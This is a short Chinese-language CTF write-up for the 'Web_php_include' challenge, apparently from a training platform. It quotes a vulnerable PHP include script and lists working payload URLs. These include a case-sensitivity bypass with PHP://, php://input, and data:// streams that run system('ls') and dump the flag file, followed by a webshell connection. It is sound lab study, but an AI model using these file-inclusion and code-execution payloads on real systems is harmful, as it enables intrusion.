Web_php_unserialize
php_rce
web_php_include
1、漏洞点:php strstr() 绕过,伪协议包含漏洞
这个提有很多利用方法。
方法一:
访问页面看到如下:
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {$page=str_replace("php://", "", $page);
}
include($page);
?>
strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。就是会去除php://,所以需要绕过
因为strstr()函数对大小写敏感,所以只需PHP://即可绕过
再者就是文件包含,这里已经算是提示咱们用伪协议。看了一些资料之后。
发现
php://input,需要开启allow_url_include。将post请求的数据当作php代码执行。
所以,我们就运行shell了。
方法2
外部包含,我这我不是很理解,不明白hello传进去就会被执行,回头再分析分析
1.审计php代码,while函数根据page参数来判断php文件是否存在,如果存在此文件,则进行文件包含。
2.默认页面为http://127.0.0.1/index.php,设置为page值,可确保while为真
3.利用hello参数将执行内容显示,flag如图所示
http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?system(%22ls%22);?%3E
http://192.168.100.161:50281/?page=http://127.0.0.1/index.php/?hello=%3C?show_source(%22fl4gisisish3r3.php%22);?%3E
方法3
更换伪协议 data://text/plain,这个大致含义是可以运行GET过去的数据流。
http://111.198.29.45:53463/?page=data://text/plain,%3C?php%20system(%27ls%27);?%3E
http://111.198.29.45:53463/?page=data://text/plain,%3C?php%20$a=file_get_contents(%27fl4gisisish3r3.php%27);echo%20base64_encode($a);?%3E
或者highlight_file(%27fl4gisisish3r3.php%27);
方法4
扫描后台文件:
登录phpadmin,用户名root 密码为空
然后执行
之后菜刀链接即可
参考链接:
伪协议与文件包含
攻防世界Web_php_include
phpMyadmin提权那些事